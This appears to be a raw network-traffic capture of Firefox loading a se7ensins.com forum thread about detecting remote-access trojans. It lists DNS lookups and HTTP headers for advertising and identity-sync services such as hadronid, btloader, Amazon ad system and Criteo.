cache-control: max-age=3600
expires: Sun, 26 May 2024 03:06:22 GMT
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RuFIugFhwCzk0WyC93EykpVTx6ZezS8%2Fqz5Leg1vDDP%2BLjaixAXRKdqTktCEjRBFNC4qXMnEXRXQwES74H81BC0hm7DQkHQl2JZFYYml50C%2BwBoQmaKNMO3ORLb6tI0euXEjPLJYXYPdjFAkx3PU8w%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
vary: Accept-Encoding
server: cloudflare
cf-ray: 889a349b88506383-LHR
GET

https://cdn.hadronid.net/hadron.js?url=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&ref=https%3A%2F%2Fwww.google.com%2F&_it=freestar&partner_id=474&ha=_hadron

firefox.exe

Remote address:

104.22.53.173:443

Request

GET /hadron.js?url=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&ref=https%3A%2F%2Fwww.google.com%2F&_it=freestar&partner_id=474&ha=_hadron HTTP/2.0
host: cdn.hadronid.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:22 GMT
content-type: application/javascript
cf-bgj: minify
etag: W/"4f8d7eccb8b77bff110a91871ebadcc0"
last-modified: Thu, 07 Mar 2024 15:57:22 GMT
x-amz-id-2: wVIO1wrs31x1jKRIz3dKPn3IKJaxmFZdB4TaOgRyJwNYeBol3+8I/Y1HD2dEOHBU8sCH74De62g=
x-amz-request-id: GPA71GZPJYF3GMCR
cache-control: max-age=432000
cf-cache-status: HIT
age: 5567
vary: Accept-Encoding
server: cloudflare
cf-ray: 889a349b9e6b66f1-AMS
content-encoding: gzip
DNS

btloader.com

firefox.exe

Remote address:

8.8.8.8:53

Request

btloader.com

IN A

Response

btloader.com

IN A

104.22.75.216

btloader.com

IN A

104.22.74.216

btloader.com

IN A

172.67.41.60
DNS

id.hadron.ad.gt

firefox.exe

Remote address:

8.8.8.8:53

Request

id.hadron.ad.gt

IN A

Response

id.hadron.ad.gt

IN CNAME

id.hadron.ad.gt.cdn.cloudflare.net

id.hadron.ad.gt.cdn.cloudflare.net

IN A

104.22.5.69

id.hadron.ad.gt.cdn.cloudflare.net

IN A

172.67.23.234

id.hadron.ad.gt.cdn.cloudflare.net

IN A

104.22.4.69
GET

https://btloader.com/tag?h=freestar-io&upapi=true

firefox.exe

Remote address:

104.22.75.216:443

Request

GET /tag?h=freestar-io&upapi=true HTTP/2.0
host: btloader.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.se7ensins.com/
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:22 GMT
content-type: application/javascript
content-length: 18400
cache-control: public, max-age=300, must-revalidate, stale-if-error=3600, stale-while-revalidate=300
content-encoding: gzip
etag: "2b2e23db1a20a9ced3bfaef9b2ddba83"
last-modified: Sun, 26 May 2024 01:12:46 GMT
vary: Origin, Accept-Encoding
via: 1.1 google
cf-cache-status: HIT
age: 3028
accept-ranges: bytes
server: cloudflare
cf-ray: 889a349cfc080b8e-AMS
DNS

btloader.com

firefox.exe

Remote address:

8.8.8.8:53

Request

btloader.com

IN A

Response

btloader.com

IN A

104.22.75.216

btloader.com

IN A

104.22.74.216

btloader.com

IN A

172.67.41.60
OPTIONS

https://id.hadron.ad.gt/v1/hadron.json?_it=freestar&partner_id=474&sync=0&domain=www.se7ensins.com&url=https://www.se7ensins.com/forums/threads/how-to-tell-if-youve-been-ratted.470346/

firefox.exe

Remote address:

104.22.5.69:443

Request

OPTIONS /v1/hadron.json?_it=freestar&partner_id=474&sync=0&domain=www.se7ensins.com&url=https://www.se7ensins.com/forums/threads/how-to-tell-if-youve-been-ratted.470346/ HTTP/2.0
host: id.hadron.ad.gt
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: GET
access-control-request-headers: content-type
referer: https://www.se7ensins.com/
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:22 GMT
content-type: application/json
content-length: 0
expires: Mon, 26 May 2025 02:06:22 GMT
cache-control: max-age=31536000
cache-control: public, no-transform
debug: OPTIONS block
allow: POST, OPTIONS, GET
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
access-control-allow-origin: *
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 889a349d8cbd0bb6-AMS
GET

https://id.hadron.ad.gt/v1/hadron.json?_it=freestar&partner_id=474&sync=0&domain=www.se7ensins.com&url=https://www.se7ensins.com/forums/threads/how-to-tell-if-youve-been-ratted.470346/

firefox.exe

Remote address:

104.22.5.69:443

Request

GET /v1/hadron.json?_it=freestar&partner_id=474&sync=0&domain=www.se7ensins.com&url=https://www.se7ensins.com/forums/threads/how-to-tell-if-youve-been-ratted.470346/ HTTP/2.0
host: id.hadron.ad.gt
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:22 GMT
content-type: application/json
access-control-allow-credentials: true
access-control-allow-headers: authorization
access-control-allow-methods: HEAD,GET,POST,PUT,DELETE,OPTIONS
access-control-allow-origin: *
cache-control: private,max-age=30
debug: NON-OPTIONS
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 889a349e5d360bb6-AMS
content-encoding: gzip
GET

https://id.hadron.ad.gt/api/v1/pbhid?partner_id=474&_it=prebid&t=1&src=id&gdprString=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdpr=1&us_privacy=1---

firefox.exe

Remote address:

104.22.5.69:443

Request

GET /api/v1/pbhid?partner_id=474&_it=prebid&t=1&src=id&gdprString=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdpr=1&us_privacy=1--- HTTP/2.0
host: id.hadron.ad.gt
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: text/plain
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:23 GMT
content-type: application/json
access-control-allow-origin: *
allow: POST, OPTIONS, GET
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
vary: Accept-Encoding
server: cloudflare
cf-ray: 889a34a448870bb6-AMS
content-encoding: gzip
OPTIONS

https://id.hadron.ad.gt/api/v1/rtd

firefox.exe

Remote address:

104.22.5.69:443

Request

OPTIONS /api/v1/rtd HTTP/2.0
host: id.hadron.ad.gt
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: POST
access-control-request-headers: content-type
referer: https://www.se7ensins.com/
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:28 GMT
content-type: application/json
content-length: 0
debug: rtd-nx-ny
cf-cache-status: DYNAMIC
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
access-control-allow-origin: *
server: cloudflare
cf-ray: 889a34c179350bb6-AMS
OPTIONS

https://id.hadron.ad.gt/api/v1/rtd

firefox.exe

Remote address:

104.22.5.69:443

Request

OPTIONS /api/v1/rtd HTTP/2.0
host: id.hadron.ad.gt
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: POST
access-control-request-headers: content-type
referer: https://www.se7ensins.com/
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:28 GMT
content-type: application/json
content-length: 0
debug: rtd-nx-ny
cf-cache-status: DYNAMIC
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
access-control-allow-origin: *
server: cloudflare
cf-ray: 889a34c179370bb6-AMS
POST

https://id.hadron.ad.gt/api/v1/rtd

firefox.exe

Remote address:

104.22.5.69:443

Request

POST /api/v1/rtd HTTP/2.0
host: id.hadron.ad.gt
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
content-length: 2577
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:28 GMT
content-type: application/json
content-length: 27
debug: rtd-nx-ny
cf-cache-status: DYNAMIC
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
access-control-allow-origin: *
server: cloudflare
cf-ray: 889a34c2a9d80bb6-AMS
POST

https://id.hadron.ad.gt/api/v1/rtd

firefox.exe

Remote address:

104.22.5.69:443

Request

POST /api/v1/rtd HTTP/2.0
host: id.hadron.ad.gt
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
content-length: 2577
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:28 GMT
content-type: application/json
content-length: 27
debug: rtd-nx-ny
cf-cache-status: DYNAMIC
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
access-control-allow-origin: *
server: cloudflare
cf-ray: 889a34c2b9d90bb6-AMS
OPTIONS

https://id.hadron.ad.gt/api/v1/rtd

firefox.exe

Remote address:

104.22.5.69:443

Request

OPTIONS /api/v1/rtd HTTP/2.0
host: id.hadron.ad.gt
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: POST
access-control-request-headers: content-type
referer: https://www.se7ensins.com/
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:56 GMT
content-type: application/json
content-length: 0
debug: rtd-nx-ny
cf-cache-status: DYNAMIC
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
access-control-allow-origin: *
server: cloudflare
cf-ray: 889a35704f720bb6-AMS
OPTIONS

https://id.hadron.ad.gt/api/v1/rtd

firefox.exe

Remote address:

104.22.5.69:443

Request

OPTIONS /api/v1/rtd HTTP/2.0
host: id.hadron.ad.gt
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: POST
access-control-request-headers: content-type
referer: https://www.se7ensins.com/
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:56 GMT
content-type: application/json
content-length: 0
debug: rtd-nx-ny
cf-cache-status: DYNAMIC
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
access-control-allow-origin: *
server: cloudflare
cf-ray: 889a35705f730bb6-AMS
OPTIONS

https://id.hadron.ad.gt/api/v1/rtd

firefox.exe

Remote address:

104.22.5.69:443

Request

OPTIONS /api/v1/rtd HTTP/2.0
host: id.hadron.ad.gt
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: POST
access-control-request-headers: content-type
referer: https://www.se7ensins.com/
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:56 GMT
content-type: application/json
content-length: 0
debug: rtd-nx-ny
cf-cache-status: DYNAMIC
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
access-control-allow-origin: *
server: cloudflare
cf-ray: 889a35704f700bb6-AMS
POST

https://id.hadron.ad.gt/api/v1/rtd

firefox.exe

Remote address:

104.22.5.69:443

Request

POST /api/v1/rtd HTTP/2.0
host: id.hadron.ad.gt
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
content-length: 3004
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:56 GMT
content-type: application/json
content-length: 27
debug: rtd-nx-ny
cf-cache-status: DYNAMIC
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
access-control-allow-origin: *
server: cloudflare
cf-ray: 889a35712fe80bb6-AMS
POST

https://id.hadron.ad.gt/api/v1/rtd

firefox.exe

Remote address:

104.22.5.69:443

Request

POST /api/v1/rtd HTTP/2.0
host: id.hadron.ad.gt
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
content-length: 3004
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:56 GMT
content-type: application/json
content-length: 27
debug: rtd-nx-ny
cf-cache-status: DYNAMIC
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
access-control-allow-origin: *
server: cloudflare
cf-ray: 889a35712fea0bb6-AMS
POST

https://id.hadron.ad.gt/api/v1/rtd

firefox.exe

Remote address:

104.22.5.69:443

Request

POST /api/v1/rtd HTTP/2.0
host: id.hadron.ad.gt
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
content-length: 3004
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:56 GMT
content-type: application/json
content-length: 27
debug: rtd-nx-ny
cf-cache-status: DYNAMIC
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
access-control-allow-origin: *
server: cloudflare
cf-ray: 889a357198480bb6-AMS
DNS

id.hadron.ad.gt.cdn.cloudflare.net

firefox.exe

Remote address:

8.8.8.8:53

Request

id.hadron.ad.gt.cdn.cloudflare.net

IN A

Response

id.hadron.ad.gt.cdn.cloudflare.net

IN A

172.67.23.234

id.hadron.ad.gt.cdn.cloudflare.net

IN A

104.22.5.69

id.hadron.ad.gt.cdn.cloudflare.net

IN A

104.22.4.69
DNS

btloader.com

firefox.exe

Remote address:

8.8.8.8:53

Request

btloader.com

IN AAAA

Response

btloader.com

IN AAAA

2606:4700:10::ac43:293c

btloader.com

IN AAAA

2606:4700:10::6816:4ad8

btloader.com

IN AAAA

2606:4700:10::6816:4bd8
DNS

id.hadron.ad.gt.cdn.cloudflare.net

firefox.exe

Remote address:

8.8.8.8:53

Request

id.hadron.ad.gt.cdn.cloudflare.net

IN AAAA

Response

id.hadron.ad.gt.cdn.cloudflare.net

IN AAAA

2606:4700:10::6816:445

id.hadron.ad.gt.cdn.cloudflare.net

IN AAAA

2606:4700:10::ac43:17ea

id.hadron.ad.gt.cdn.cloudflare.net

IN AAAA

2606:4700:10::6816:545
DNS

91.140.162.3.in-addr.arpa

Remote address:

8.8.8.8:53

Request

91.140.162.3.in-addr.arpa

IN PTR

Response

91.140.162.3.in-addr.arpa

IN PTR

server-3-162-140-91dub56r cloudfrontnet
DNS

159.74.228.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

159.74.228.91.in-addr.arpa

IN PTR

Response
DNS

90.43.18.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

90.43.18.104.in-addr.arpa

IN PTR

Response
DNS

50.9.26.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.9.26.104.in-addr.arpa

IN PTR

Response
DNS

173.53.22.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

173.53.22.104.in-addr.arpa

IN PTR

Response
DNS

69.5.22.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

69.5.22.104.in-addr.arpa

IN PTR

Response
DNS

216.75.22.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

216.75.22.104.in-addr.arpa

IN PTR

Response
GET

https://c.amazon-adsystem.com/aax2/apstag.js

firefox.exe

Remote address:

3.162.142.187:443

Request

GET /aax2/apstag.js HTTP/2.0
host: c.amazon-adsystem.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: application/javascript
date: Sun, 26 May 2024 01:06:51 GMT
last-modified: Tue, 07 May 2024 20:29:12 GMT
x-amz-server-side-encryption: AES256
cache-control: max-age=3600
server: AmazonS3
content-encoding: gzip
via: 1.1 89272fa8378ebd4efc80c03ddba9dd9e.cloudfront.net (CloudFront), 1.1 30b7c7ba62a58191e6dc0b2f231501a4.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P2
etag: W/"299fe111f64c76143769e50e3f9edd6e"
vary: Accept-Encoding
x-cache: Hit from cloudfront
x-amz-cf-pop: DUB56-P2
x-amz-cf-id: r-S2-qscXi2EAJ3TuqdI6hT_rqGphGMmsL5ukwtqpUSR0a839aHd8A==
age: 3572
GET

https://c.amazon-adsystem.com/cdn/prod/config?src=600&u=https%3A%2F%2Fwww.se7ensins.com&pubid=0ab198dd-b265-462a-ae36-74e163ad6159

firefox.exe

Remote address:

3.162.142.187:443

Request

GET /cdn/prod/config?src=600&u=https%3A%2F%2Fwww.se7ensins.com&pubid=0ab198dd-b265-462a-ae36-74e163ad6159 HTTP/2.0
host: c.amazon-adsystem.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: application/javascript
access-control-allow-origin: *
access-control-allow-methods: GET
access-control-max-age: 3000
last-modified: Thu, 29 Feb 2024 02:13:08 GMT
x-amz-server-side-encryption: AES256
x-amz-version-id: r5.lR.LJ66XEXzxUUVo7iMemjL_F_GoE
server: AmazonS3
content-encoding: gzip
date: Sat, 25 May 2024 05:12:02 GMT
cache-control: public, max-age=86400
etag: W/"a4d296427fc806b21335359e398c025c"
vary: Accept-Encoding,Origin
x-cache: Hit from cloudfront
via: 1.1 30b7c7ba62a58191e6dc0b2f231501a4.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P2
x-amz-cf-id: nSvqfEoVsn-5jvMv__2khxLQFwC-DRtmJ-UmStTju8cnVWW_X0WsfQ==
age: 75266
GET

https://c.amazon-adsystem.com/bao-csm/aps-comm/aps_csm.js

firefox.exe

Remote address:

3.162.142.187:443

Request

GET /bao-csm/aps-comm/aps_csm.js HTTP/2.0
host: c.amazon-adsystem.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: application/json;charset=UTF-8
content-length: 1355
access-control-allow-origin: https://www.se7ensins.com
access-control-allow-credentials: true
cache-control: max-age=21550, s-maxage=21600
date: Sun, 26 May 2024 02:06:27 GMT
server: Server
x-cache: Miss from cloudfront
via: 1.1 30b7c7ba62a58191e6dc0b2f231501a4.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P2
x-amz-cf-id: 4ZEVd-vW7flGIo2HWcfEwJKQFOJwVxAEugtiITeFRGfF-syYGLMjEw==
DNS

ups.analytics.yahoo.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ups.analytics.yahoo.com

IN A

Response

ups.analytics.yahoo.com

IN CNAME

prod.ups-ats.aolp-ds-prd.aws.oath.cloud

prod.ups-ats.aolp-ds-prd.aws.oath.cloud

IN CNAME

prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloud

prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloud

IN CNAME

ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud

ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud

IN A

3.75.62.37

ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud

IN A

3.71.149.231
DNS

gum.criteo.com

firefox.exe

Remote address:

8.8.8.8:53

Request

gum.criteo.com

IN A

Response

gum.criteo.com

IN CNAME

gum.nl3.vip.prod.criteo.com

gum.nl3.vip.prod.criteo.com

IN A

178.250.1.11
DNS

ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud

firefox.exe

Remote address:

8.8.8.8:53

Request

ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud

IN A

Response

ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud

IN A

3.75.62.37

ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud

IN A

3.71.149.231
DNS

ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud

firefox.exe

Remote address:

8.8.8.8:53

Request

ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud

IN A

Response

ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud

IN A

3.71.149.231

